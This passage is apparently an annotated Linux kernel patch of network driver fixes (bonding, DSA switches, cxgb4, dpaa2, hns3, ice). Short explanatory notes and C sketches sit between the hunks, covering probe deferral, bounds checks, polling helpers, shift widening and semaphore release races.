+ 	host->ciu_clk = devm_clk_get(host->dev, "ciu");
+ 	if (IS_ERR(host->ciu_clk)) {
+ 		dev_dbg(host->dev, "ciu clock not available\n");
++		ret = PTR_ERR(host->ciu_clk);
++		if (ret == -EPROBE_DEFER)
++			goto err_clk_biu;
++
+ 		host->bus_hz = host->pdata->bus_hz;
+ 	} else {
+ 		ret = clk_prepare_enable(host->ciu_clk);
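
Sketch of the probe fix above: when a clock is optional, most devm_clk_get() errors can be tolerated, but -EPROBE_DEFER must still be propagated, otherwise the device is probed once, too early, and never retried after the clock provider appears. Illustrative shape:

#include <linux/clk.h>
#include <linux/err.h>

static int get_optional_clock(struct device *dev, struct clk **out)
{
	struct clk *clk = devm_clk_get(dev, "biu");

	if (IS_ERR(clk)) {
		if (PTR_ERR(clk) == -EPROBE_DEFER)
			return -EPROBE_DEFER;	/* retry probe later */
		clk = NULL;			/* treat as "no clock" */
	}
	*out = clk;
	return 0;
}

On trees where it is available, devm_clk_get_optional() encodes the same policy directly, returning NULL rather than an error when the clock simply isn't described.
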
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index be5348d0b22e5..c218352814430 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -578,7 +578,6 @@ static void bond_ipsec_del_sa_all(struct bonding *bond)
+ 		} else {
+ 			slave->dev->xfrmdev_ops->xdo_dev_state_delete(ipsec->xs);
+ 		}
+-		ipsec->xs->xso.real_dev = NULL;
+ 	}
+ 	spin_unlock_bh(&bond->ipsec_lock);
+ 	rcu_read_unlock();
+@@ -595,34 +594,30 @@ static bool bond_ipsec_offload_ok(struct sk_buff *skb, struct xfrm_state *xs)
+ 	struct net_device *real_dev;
+ 	struct slave *curr_active;
+ 	struct bonding *bond;
+-	int err;
++	bool ok = false;
+ 
+ 	bond = netdev_priv(bond_dev);
+ 	rcu_read_lock();
+ 	curr_active = rcu_dereference(bond->curr_active_slave);
++	if (!curr_active)
++		goto out;
+ 	real_dev = curr_active->dev;
+ 
+-	if (BOND_MODE(bond) != BOND_MODE_ACTIVEBACKUP) {
+-		err = false;
++	if (BOND_MODE(bond) != BOND_MODE_ACTIVEBACKUP)
+ 		goto out;
+-	}
+ 
+-	if (!xs->xso.real_dev) {
+-		err = false;
++	if (!xs->xso.real_dev)
+ 		goto out;
+-	}
+ 
+ 	if (!real_dev->xfrmdev_ops ||
+ 	    !real_dev->xfrmdev_ops->xdo_dev_offload_ok ||
+-	    netif_is_bond_master(real_dev)) {
+-		err = false;
++	    netif_is_bond_master(real_dev))
+ 		goto out;
+-	}
+ 
+-	err = real_dev->xfrmdev_ops->xdo_dev_offload_ok(skb, xs);
++	ok = real_dev->xfrmdev_ops->xdo_dev_offload_ok(skb, xs);
+ out:
+ 	rcu_read_unlock();
+-	return err;
++	return ok;
+ }
+ 
+ static const struct xfrmdev_ops bond_xfrmdev_ops = {
+diff --git a/drivers/net/bonding/bond_options.c b/drivers/net/bonding/bond_options.c
+index 685fb4703ee1f..06c4cd0f00024 100644
+--- a/drivers/net/bonding/bond_options.c
++++ b/drivers/net/bonding/bond_options.c
+@@ -932,7 +932,7 @@ static int bond_option_active_slave_set(struct bonding *bond,
+ 	/* check to see if we are clearing active */
+ 	if (!slave_dev) {
+ 		netdev_dbg(bond->dev, "Clearing current active slave\n");
+-		RCU_INIT_POINTER(bond->curr_active_slave, NULL);
++		bond_change_active_slave(bond, NULL);
+ 		bond_select_active_slave(bond);
+ 	} else {
+ 		struct slave *old_active = rtnl_dereference(bond->curr_active_slave);
+diff --git a/drivers/net/dsa/mv88e6xxx/global1_atu.c b/drivers/net/dsa/mv88e6xxx/global1_atu.c
+index 7c513a03789cf..17fd62616ce6d 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1_atu.c
++++ b/drivers/net/dsa/mv88e6xxx/global1_atu.c
+@@ -453,7 +453,8 @@ static irqreturn_t mv88e6xxx_g1_atu_prob_irq_thread_fn(int irq, void *dev_id)
+ 		trace_mv88e6xxx_atu_full_violation(chip->dev, spid,
+ 						   entry.portvec, entry.mac,
+ 						   fid);
+-		chip->ports[spid].atu_full_violation++;
++		if (spid < ARRAY_SIZE(chip->ports))
++			chip->ports[spid].atu_full_violation++;
+ 	}
+ 	mv88e6xxx_reg_unlock(chip);
+ 
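
Shape of the fix above: an index decoded from hardware (here a source-port id) must be range-checked against the driver's own array before it is used, since the device can report values the driver never allocated state for. A sketch, with the array size passed explicitly (the driver itself uses ARRAY_SIZE() on a fixed-size member):

#include <linux/types.h>

struct port_stats { unsigned int violations; };

static void count_violation(struct port_stats *ports, size_t nports,
			    unsigned int spid)
{
	if (spid < nports)	/* ids out of range are not counted */
		ports[spid].violations++;
}
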
+diff --git a/drivers/net/dsa/ocelot/felix.c b/drivers/net/dsa/ocelot/felix.c
+index 2d2c6f941272c..73da407bb0685 100644
+--- a/drivers/net/dsa/ocelot/felix.c
++++ b/drivers/net/dsa/ocelot/felix.c
+@@ -528,7 +528,9 @@ static int felix_tag_8021q_setup(struct dsa_switch *ds)
+ 	 * so we need to be careful that there are no extra frames to be
+ 	 * dequeued over MMIO, since we would never know to discard them.
+ 	 */
++	ocelot_lock_xtr_grp_bh(ocelot, 0);
+ 	ocelot_drain_cpu_queue(ocelot, 0);
++	ocelot_unlock_xtr_grp_bh(ocelot, 0);
+ 
+ 	return 0;
+ }
+@@ -1493,6 +1495,8 @@ static void felix_port_deferred_xmit(struct kthread_work *work)
+ 	int port = xmit_work->dp->index;
+ 	int retries = 10;
+ 
++	ocelot_lock_inj_grp(ocelot, 0);
++
+ 	do {
+ 		if (ocelot_can_inject(ocelot, 0))
+ 			break;
+@@ -1501,6 +1505,7 @@ static void felix_port_deferred_xmit(struct kthread_work *work)
+ 	} while (--retries);
+ 
+ 	if (!retries) {
++		ocelot_unlock_inj_grp(ocelot, 0);
+ 		dev_err(ocelot->dev, "port %d failed to inject skb\n",
+ 			port);
+ 		ocelot_port_purge_txtstamp_skb(ocelot, port, skb);
+@@ -1510,6 +1515,8 @@ static void felix_port_deferred_xmit(struct kthread_work *work)
+ 
+ 	ocelot_port_inject_frame(ocelot, port, 0, rew_op, skb);
+ 
++	ocelot_unlock_inj_grp(ocelot, 0);
++
+ 	consume_skb(skb);
+ 	kfree(xmit_work);
+ }
+@@ -1658,6 +1665,8 @@ static bool felix_check_xtr_pkt(struct ocelot *ocelot)
+ 	if (!felix->info->quirk_no_xtr_irq)
+ 		return false;
+ 
++	ocelot_lock_xtr_grp(ocelot, grp);
++
+ 	while (ocelot_read(ocelot, QS_XTR_DATA_PRESENT) & BIT(grp)) {
+ 		struct sk_buff *skb;
+ 		unsigned int type;
+@@ -1694,6 +1703,8 @@ static bool felix_check_xtr_pkt(struct ocelot *ocelot)
+ 		ocelot_drain_cpu_queue(ocelot, 0);
+ 	}
+ 
++	ocelot_unlock_xtr_grp(ocelot, grp);
++
+ 	return true;
+ }
+ 
+diff --git a/drivers/net/dsa/vitesse-vsc73xx-core.c b/drivers/net/dsa/vitesse-vsc73xx-core.c
+index 3efd556690563..c8e9ca5d5c284 100644
+--- a/drivers/net/dsa/vitesse-vsc73xx-core.c
++++ b/drivers/net/dsa/vitesse-vsc73xx-core.c
+@@ -17,6 +17,7 @@
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/device.h>
++#include <linux/iopoll.h>
+ #include <linux/of.h>
+ #include <linux/of_device.h>
+ #include <linux/of_mdio.h>
+@@ -38,6 +39,10 @@
+ #define VSC73XX_BLOCK_ARBITER	0x5 /* Only subblock 0 */
+ #define VSC73XX_BLOCK_SYSTEM	0x7 /* Only subblock 0 */
+ 
++/* MII Block subblock */
++#define VSC73XX_BLOCK_MII_INTERNAL	0x0 /* Internal MDIO subblock */
++#define VSC73XX_BLOCK_MII_EXTERNAL	0x1 /* External MDIO subblock */
++
+ #define CPU_PORT	6 /* CPU port */
+ 
+ /* MAC Block registers */
+@@ -196,6 +201,8 @@
+ #define VSC73XX_MII_CMD		0x1
+ #define VSC73XX_MII_DATA	0x2
+ 
++#define VSC73XX_MII_STAT_BUSY	BIT(3)
++
+ /* Arbiter block 5 registers */
+ #define VSC73XX_ARBEMPTY		0x0c
+ #define VSC73XX_ARBDISC			0x0e
+@@ -269,6 +276,10 @@
+ #define IS_7398(a) ((a)->chipid == VSC73XX_CHIPID_ID_7398)
+ #define IS_739X(a) (IS_7395(a) || IS_7398(a))
+ 
++#define VSC73XX_POLL_SLEEP_US		1000
++#define VSC73XX_MDIO_POLL_SLEEP_US	5
++#define VSC73XX_POLL_TIMEOUT_US		10000
++
+ struct vsc73xx_counter {
+ 	u8 counter;
+ 	const char *name;
+@@ -484,6 +495,22 @@ static int vsc73xx_detect(struct vsc73xx *vsc)
+ 	return 0;
+ }
+ 
++static int vsc73xx_mdio_busy_check(struct vsc73xx *vsc)
++{
++	int ret, err;
++	u32 val;
++
++	ret = read_poll_timeout(vsc73xx_read, err,
++				err < 0 || !(val & VSC73XX_MII_STAT_BUSY),
++				VSC73XX_MDIO_POLL_SLEEP_US,
++				VSC73XX_POLL_TIMEOUT_US, false, vsc,
++				VSC73XX_BLOCK_MII, VSC73XX_BLOCK_MII_INTERNAL,
++				VSC73XX_MII_STAT, &val);
++	if (ret)
++		return ret;
++	return err;
++}
++
+ static int vsc73xx_phy_read(struct dsa_switch *ds, int phy, int regnum)
+ {
+ 	struct vsc73xx *vsc = ds->priv;
+@@ -491,12 +518,20 @@ static int vsc73xx_phy_read(struct dsa_switch *ds, int phy, int regnum)
+ 	u32 val;
+ 	int ret;
+ 
++	ret = vsc73xx_mdio_busy_check(vsc);
++	if (ret)
++		return ret;
++
+ 	/* Setting bit 26 means "read" */
+ 	cmd = BIT(26) | (phy << 21) | (regnum << 16);
+ 	ret = vsc73xx_write(vsc, VSC73XX_BLOCK_MII, 0, 1, cmd);
+ 	if (ret)
+ 		return ret;
+-	msleep(2);
++
++	ret = vsc73xx_mdio_busy_check(vsc);
++	if (ret)
++		return ret;
++
+ 	ret = vsc73xx_read(vsc, VSC73XX_BLOCK_MII, 0, 2, &val);
+ 	if (ret)
+ 		return ret;
+@@ -520,6 +555,10 @@ static int vsc73xx_phy_write(struct dsa_switch *ds, int phy, int regnum,
+ 	u32 cmd;
+ 	int ret;
+ 
++	ret = vsc73xx_mdio_busy_check(vsc);
++	if (ret)
++		return ret;
++
+ 	/* It was found through tedious experiments that this router
+ 	 * chip really hates to have its PHYs reset. They
+ 	 * never recover if that happens: autonegotiation stops
+@@ -531,7 +570,7 @@ static int vsc73xx_phy_write(struct dsa_switch *ds, int phy, int regnum,
+ 		return 0;
+ 	}
+ 
+-	cmd = (phy << 21) | (regnum << 16);
++	cmd = (phy << 21) | (regnum << 16) | val;
+ 	ret = vsc73xx_write(vsc, VSC73XX_BLOCK_MII, 0, 1, cmd);
+ 	if (ret)
+ 		return ret;
+@@ -780,7 +819,7 @@ static void vsc73xx_adjust_link(struct dsa_switch *ds, int port,
+ 	 * after a PHY or the CPU port comes up or down.
+ 	 */
+ 	if (!phydev->link) {
+-		int maxloop = 10;
++		int ret, err;
+ 
+ 		dev_dbg(vsc->dev, "port %d: went down\n",
+ 			port);
+@@ -795,19 +834,17 @@ static void vsc73xx_adjust_link(struct dsa_switch *ds, int port,
+ 				    VSC73XX_ARBDISC, BIT(port), BIT(port));
+ 
+ 		/* Wait until queue is empty */
+-		vsc73xx_read(vsc, VSC73XX_BLOCK_ARBITER, 0,
+-			     VSC73XX_ARBEMPTY, &val);
+-		while (!(val & BIT(port))) {
+-			msleep(1);
+-			vsc73xx_read(vsc, VSC73XX_BLOCK_ARBITER, 0,
+-				     VSC73XX_ARBEMPTY, &val);
+-			if (--maxloop == 0) {
+-				dev_err(vsc->dev,
+-					"timeout waiting for block arbiter\n");
+-				/* Continue anyway */
+-				break;
+-			}
+-		}
++		ret = read_poll_timeout(vsc73xx_read, err,
++					err < 0 || (val & BIT(port)),
++					VSC73XX_POLL_SLEEP_US,
++					VSC73XX_POLL_TIMEOUT_US, false,
++					vsc, VSC73XX_BLOCK_ARBITER, 0,
++					VSC73XX_ARBEMPTY, &val);
++		if (ret)
++			dev_err(vsc->dev,
++				"timeout waiting for block arbiter\n");
++		else if (err < 0)
++			dev_err(vsc->dev, "error reading arbiter\n");
+ 
+ 		/* Put this port into reset */
+ 		vsc73xx_write(vsc, VSC73XX_BLOCK_MAC, port, VSC73XX_MAC_CFG,
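
The conversions in this file replace hand-rolled msleep() loops with read_poll_timeout() from <linux/iopoll.h>: `op(args...)` is called until either `cond` is true or `timeout_us` expires, and the accessor's own return value can be folded into `cond` so bus errors end the poll early. A minimal sketch (example_read() is a hypothetical stand-in for the driver's register accessor):

#include <linux/iopoll.h>

int example_read(void *ctx, u32 *val);	/* hypothetical accessor */

static int wait_bit_set(void *ctx, u32 mask)
{
	int ret, err;
	u32 val;

	/* err = example_read(ctx, &val) each iteration; stop when the
	 * read fails or the bit comes up, or after 10 ms */
	ret = read_poll_timeout(example_read, err,
				err < 0 || (val & mask),
				1000, 10000, false, ctx, &val);
	return ret ? ret : err;	/* -ETIMEDOUT, accessor error, or 0 */
}
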
+diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_filter.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_filter.c
+index 786ceae344887..dd9e68465e697 100644
+--- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_filter.c
++++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_filter.c
+@@ -1244,7 +1244,8 @@ static u64 hash_filter_ntuple(struct ch_filter_specification *fs,
+ 	 * in the Compressed Filter Tuple.
+ 	 */
+ 	if (tp->vlan_shift >= 0 && fs->mask.ivlan)
+-		ntuple |= (FT_VLAN_VLD_F | fs->val.ivlan) << tp->vlan_shift;
++		ntuple |= (u64)(FT_VLAN_VLD_F |
++				fs->val.ivlan) << tp->vlan_shift;
+ 
+ 	if (tp->port_shift >= 0 && fs->mask.iport)
+ 		ntuple |= (u64)fs->val.iport << tp->port_shift;
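
Why the (u64) cast matters: a shift is evaluated in the type of its left operand, so OR-ing a 32-bit value shifted into the upper half of a 64-bit tuple silently loses those bits, and a shift count of 32 or more on a 32-bit operand is outright undefined behaviour. Widening first keeps everything:

#include <linux/types.h>

static u64 pack_field(u32 field, unsigned int shift)
{
	return (u64)field << shift;	/* not: field << shift */
}
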
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
+index b98ef4ba172f6..d6c871f227947 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
+@@ -2583,13 +2583,14 @@ static int dpaa2_switch_refill_bp(struct ethsw_core *ethsw)
+ 
+ static int dpaa2_switch_seed_bp(struct ethsw_core *ethsw)
+ {
+-	int *count, i;
++	int *count, ret, i;
+ 
+ 	for (i = 0; i < DPAA2_ETHSW_NUM_BUFS; i += BUFS_PER_CMD) {
++		ret = dpaa2_switch_add_bufs(ethsw, ethsw->bpid);
+ 		count = &ethsw->buf_count;
+-		*count += dpaa2_switch_add_bufs(ethsw, ethsw->bpid);
++		*count += ret;
+ 
+-		if (unlikely(*count < BUFS_PER_CMD))
++		if (unlikely(ret < BUFS_PER_CMD))
+ 			return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 4ce43c3a00a37..0377a056aaecc 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -5728,6 +5728,9 @@ static int hns3_reset_notify_uninit_enet(struct hnae3_handle *handle)
+ 	struct net_device *netdev = handle->kinfo.netdev;
+ 	struct hns3_nic_priv *priv = netdev_priv(netdev);
+ 
++	if (!test_bit(HNS3_NIC_STATE_DOWN, &priv->state))
++		hns3_nic_net_stop(netdev);
++
+ 	if (!test_and_clear_bit(HNS3_NIC_STATE_INITED, &priv->state)) {
+ 		netdev_warn(netdev, "already uninitialized\n");
+ 		return 0;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 01e24b69e9203..45bd5c79e4da8 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -2696,8 +2696,17 @@ static int hclge_cfg_mac_speed_dup_h(struct hnae3_handle *handle, int speed,
+ {
+ 	struct hclge_vport *vport = hclge_get_vport(handle);
+ 	struct hclge_dev *hdev = vport->back;
++	int ret;
++
++	ret = hclge_cfg_mac_speed_dup(hdev, speed, duplex, lane_num);
++
++	if (ret)
++		return ret;
+ 
+-	return hclge_cfg_mac_speed_dup(hdev, speed, duplex, lane_num);
++	hdev->hw.mac.req_speed = speed;
++	hdev->hw.mac.req_duplex = duplex;
++
++	return 0;
+ }
+ 
+ static int hclge_set_autoneg_en(struct hclge_dev *hdev, bool enable)
+@@ -2999,17 +3008,20 @@ static int hclge_mac_init(struct hclge_dev *hdev)
+ 	if (!test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state))
+ 		hdev->hw.mac.duplex = HCLGE_MAC_FULL;
+ 
+-	ret = hclge_cfg_mac_speed_dup_hw(hdev, hdev->hw.mac.speed,
+-					 hdev->hw.mac.duplex, hdev->hw.mac.lane_num);
+-	if (ret)
+-		return ret;
+-
+ 	if (hdev->hw.mac.support_autoneg) {
+ 		ret = hclge_set_autoneg_en(hdev, hdev->hw.mac.autoneg);
+ 		if (ret)
+ 			return ret;
+ 	}
+ 
++	if (!hdev->hw.mac.autoneg) {
++		ret = hclge_cfg_mac_speed_dup_hw(hdev, hdev->hw.mac.req_speed,
++						 hdev->hw.mac.req_duplex,
++						 hdev->hw.mac.lane_num);
++		if (ret)
++			return ret;
++	}
++
+ 	mac->link = 0;
+ 
+ 	if (mac->user_fec_mode & BIT(HNAE3_FEC_USER_DEF)) {
+@@ -11538,8 +11550,8 @@ static void hclge_reset_done(struct hnae3_ae_dev *ae_dev)
+ 		dev_err(&hdev->pdev->dev, "fail to rebuild, ret=%d\n", ret);
+ 
+ 	hdev->reset_type = HNAE3_NONE_RESET;
+-	clear_bit(HCLGE_STATE_RST_HANDLING, &hdev->state);
+-	up(&hdev->reset_sem);
++	if (test_and_clear_bit(HCLGE_STATE_RST_HANDLING, &hdev->state))
++		up(&hdev->reset_sem);
+ }
+ 
+ static void hclge_clear_resetting_state(struct hclge_dev *hdev)
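
Both this hunk and the matching hclgevf one below guard the semaphore release with the atomic test_and_clear_bit(): when two reset paths race to finish, only the one that actually owned the RST_HANDLING bit performs the up(), so the semaphore count cannot be incremented twice. A minimal sketch:

#include <linux/bitops.h>
#include <linux/semaphore.h>

static void reset_done(unsigned long *state, unsigned int bit,
		       struct semaphore *sem)
{
	/* atomic: exactly one racing caller sees the bit set */
	if (test_and_clear_bit(bit, state))
		up(sem);
}
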
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+index 877feee53804f..61e155c4d441e 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+@@ -1124,10 +1124,11 @@ void hclge_mbx_handler(struct hclge_dev *hdev)
+ 		req = (struct hclge_mbx_vf_to_pf_cmd *)desc->data;
+ 
+ 		flag = le16_to_cpu(crq->desc[crq->next_to_use].flag);
+-		if (unlikely(!hnae3_get_bit(flag, HCLGE_CMDQ_RX_OUTVLD_B))) {
++		if (unlikely(!hnae3_get_bit(flag, HCLGE_CMDQ_RX_OUTVLD_B) ||
++			     req->mbx_src_vfid > hdev->num_req_vfs)) {
+ 			dev_warn(&hdev->pdev->dev,
+-				 "dropped invalid mailbox message, code = %u\n",
+-				 req->msg.code);
++				 "dropped invalid mailbox message, code = %u, vfid = %u\n",
++				 req->msg.code, req->mbx_src_vfid);
+ 
+ 			/* dropping/not processing this invalid message */
+ 			crq->desc[crq->next_to_use].flag = 0;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mdio.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mdio.c
+index 85fb11de43a12..80079657afebe 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mdio.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mdio.c
+@@ -191,6 +191,9 @@ static void hclge_mac_adjust_link(struct net_device *netdev)
+ 	if (ret)
+ 		netdev_err(netdev, "failed to adjust link.\n");
+ 
++	hdev->hw.mac.req_speed = (u32)speed;
++	hdev->hw.mac.req_duplex = (u8)duplex;
++
+ 	ret = hclge_cfg_flowctrl(hdev);
+ 	if (ret)
+ 		netdev_err(netdev, "failed to configure flow control.\n");
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index 1f5a27fb309aa..aebb104f4c290 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -1764,8 +1764,8 @@ static void hclgevf_reset_done(struct hnae3_ae_dev *ae_dev)
+ 			 ret);
+ 
+ 	hdev->reset_type = HNAE3_NONE_RESET;
+-	clear_bit(HCLGEVF_STATE_RST_HANDLING, &hdev->state);
+-	up(&hdev->reset_sem);
++	if (test_and_clear_bit(HCLGEVF_STATE_RST_HANDLING, &hdev->state))
++		up(&hdev->reset_sem);
+ }
+ 
+ static u32 hclgevf_get_fw_version(struct hnae3_handle *handle)
+diff --git a/drivers/net/ethernet/i825xx/sun3_82586.c b/drivers/net/ethernet/i825xx/sun3_82586.c
+index 3909c6a0af89f..72d3b5328ebb4 100644
+--- a/drivers/net/ethernet/i825xx/sun3_82586.c
++++ b/drivers/net/ethernet/i825xx/sun3_82586.c
+@@ -986,7 +986,7 @@ static void sun3_82586_timeout(struct net_device *dev, unsigned int txqueue)
+ 	{
+ #ifdef DEBUG
+ 		printk("%s: xmitter timed out, try to restart! stat: %02x\n",dev->name,p->scb->cus);
+-		printk("%s: command-stats: %04x %04x\n",dev->name,swab16(p->xmit_cmds[0]->cmd_status),swab16(p->xmit_cmds[1]->cmd_status));
++		printk("%s: command-stats: %04x\n", dev->name, swab16(p->xmit_cmds[0]->cmd_status));
+ 		printk("%s: check, whether you set the right interrupt number!\n",dev->name);
+ #endif
+ 		sun3_82586_close(dev);
+diff --git a/drivers/net/ethernet/intel/ice/ice_base.c b/drivers/net/ethernet/intel/ice/ice_base.c
+index 818eca6aa4a41..4db4ec4b8857a 100644
+--- a/drivers/net/ethernet/intel/ice/ice_base.c
++++ b/drivers/net/ethernet/intel/ice/ice_base.c
+@@ -355,9 +355,6 @@ static unsigned int ice_rx_offset(struct ice_rx_ring *rx_ring)
+ {
+ 	if (ice_ring_uses_build_skb(rx_ring))
+ 		return ICE_SKB_PAD;
+-	else if (ice_is_xdp_ena_vsi(rx_ring->vsi))
+-		return XDP_PACKET_HEADROOM;
+-
+ 	return 0;
+ }
+ 
+@@ -537,6 +534,7 @@ int ice_vsi_cfg_rxq(struct ice_rx_ring *ring)
+ 		}
+ 	}
+ 
++	xdp_init_buff(&ring->xdp, ice_rx_pg_size(ring) / 2, &ring->xdp_rxq);
+ 	err = ice_setup_rx_ctx(ring);
+ 	if (err) {
+ 		dev_err(dev, "ice_setup_rx_ctx failed for RxQ %d, err %d\n",
+diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
+index 7661e735d0992..347c6c23bfc1c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_lib.c
+@@ -1818,8 +1818,8 @@ void ice_update_eth_stats(struct ice_vsi *vsi)
+ void ice_vsi_cfg_frame_size(struct ice_vsi *vsi)
+ {
+ 	if (!vsi->netdev || test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags)) {
+-		vsi->max_frame = ICE_AQ_SET_MAC_FRAME_SIZE_MAX;
+-		vsi->rx_buf_len = ICE_RXBUF_2048;
++		vsi->max_frame = ICE_MAX_FRAME_LEGACY_RX;
++		vsi->rx_buf_len = ICE_RXBUF_1664;
+ #if (PAGE_SIZE < 8192)
+ 	} else if (!ICE_2K_TOO_SMALL_WITH_PADDING &&
+ 		   (vsi->netdev->mtu <= ETH_DATA_LEN)) {
+@@ -1828,11 +1828,7 @@ void ice_vsi_cfg_frame_size(struct ice_vsi *vsi)
+ #endif
+ 	} else {
+ 		vsi->max_frame = ICE_AQ_SET_MAC_FRAME_SIZE_MAX;
+-#if (PAGE_SIZE < 8192)
+ 		vsi->rx_buf_len = ICE_RXBUF_3072;
+-#else
+-		vsi->rx_buf_len = ICE_RXBUF_2048;
+-#endif
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 6e55861dd86fe..9dbfbc90485e4 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -7328,8 +7328,8 @@ static void ice_rebuild(struct ice_pf *pf, enum ice_reset_req reset_type)
+  */
+ static int ice_max_xdp_frame_size(struct ice_vsi *vsi)
+ {
+-	if (PAGE_SIZE >= 8192 || test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags))
+-		return ICE_RXBUF_2048 - XDP_PACKET_HEADROOM;
++	if (test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags))
++		return ICE_RXBUF_1664;
+ 	else
+ 		return ICE_RXBUF_3072;
+ }
+@@ -7362,6 +7362,12 @@ static int ice_change_mtu(struct net_device *netdev, int new_mtu)
+ 				   frame_size - ICE_ETH_PKT_HDR_PAD);
+ 			return -EINVAL;
+ 		}
++	} else if (test_bit(ICE_FLAG_LEGACY_RX, pf->flags)) {
++		if (new_mtu + ICE_ETH_PKT_HDR_PAD > ICE_MAX_FRAME_LEGACY_RX) {
++			netdev_err(netdev, "Too big MTU for legacy-rx; Max is %d\n",
++				   ICE_MAX_FRAME_LEGACY_RX - ICE_ETH_PKT_HDR_PAD);
++			return -EINVAL;
++		}
+ 	}
+ 
+ 	/* if a reset is in progress, wait for some time for it to complete */
+diff --git a/drivers/net/ethernet/intel/ice/ice_txrx.c b/drivers/net/ethernet/intel/ice/ice_txrx.c
+index bd62781191b3d..6172e0daa718d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_txrx.c
++++ b/drivers/net/ethernet/intel/ice/ice_txrx.c
+@@ -523,8 +523,16 @@ int ice_setup_rx_ring(struct ice_rx_ring *rx_ring)
+ 	return -ENOMEM;
+ }
+ 
++/**
++ * ice_rx_frame_truesize - calculate the truesize of an Rx frame
++ * @rx_ring: ptr to Rx ring
++ * @size: size of the frame data
++ *
++ * Calculate the truesize, taking into account the PAGE_SIZE of the
++ * underlying arch.
++ */
+ static unsigned int
+-ice_rx_frame_truesize(struct ice_rx_ring *rx_ring, unsigned int __maybe_unused size)
++ice_rx_frame_truesize(struct ice_rx_ring *rx_ring, const unsigned int size)
+ {
+ 	unsigned int truesize;
+ 
+@@ -783,7 +791,6 @@ ice_rx_buf_adjust_pg_offset(struct ice_rx_buf *rx_buf, unsigned int size)
+ /**
+  * ice_can_reuse_rx_page - Determine if page can be reused for another Rx
+  * @rx_buf: buffer containing the page
+- * @rx_buf_pgcnt: rx_buf page refcount pre xdp_do_redirect() call
+  *
+  * If page is reusable, we have a green light for calling ice_reuse_rx_page,
+  * which will assign the current buffer to the buffer that next_to_alloc is
+@@ -791,7 +798,7 @@ ice_rx_buf_adjust_pg_offset(struct ice_rx_buf *rx_buf, unsigned int size)
+  * page freed
+  */
+ static bool
+-ice_can_reuse_rx_page(struct ice_rx_buf *rx_buf, int rx_buf_pgcnt)
++ice_can_reuse_rx_page(struct ice_rx_buf *rx_buf)
+ {
+ 	unsigned int pagecnt_bias = rx_buf->pagecnt_bias;
+ 	struct page *page = rx_buf->page;
+@@ -800,16 +807,15 @@ ice_can_reuse_rx_page(struct ice_rx_buf *rx_buf, int rx_buf_pgcnt)
+ 	if (!dev_page_is_reusable(page))
+ 		return false;
+ 
+-#if (PAGE_SIZE < 8192)
+ 	/* if we are the only owner of the page we can reuse it */
+-	if (unlikely((rx_buf_pgcnt - pagecnt_bias) > 1))
++	if (unlikely(rx_buf->pgcnt - pagecnt_bias > 1))
+ 		return false;
+-#else
++#if (PAGE_SIZE >= 8192)
+ #define ICE_LAST_OFFSET \
+-	(SKB_WITH_OVERHEAD(PAGE_SIZE) - ICE_RXBUF_2048)
++	(SKB_WITH_OVERHEAD(PAGE_SIZE) - ICE_RXBUF_3072)
+ 	if (rx_buf->page_offset > ICE_LAST_OFFSET)
+ 		return false;
+-#endif /* PAGE_SIZE < 8192) */
++#endif /* PAGE_SIZE >= 8192) */
+ 
+ 	/* If we have drained the page fragment pool we need to update
+ 	 * the pagecnt_bias and page count so that we fully restock the
+@@ -886,24 +892,19 @@ ice_reuse_rx_page(struct ice_rx_ring *rx_ring, struct ice_rx_buf *old_buf)
+  * ice_get_rx_buf - Fetch Rx buffer and synchronize data for use
+  * @rx_ring: Rx descriptor ring to transact packets on
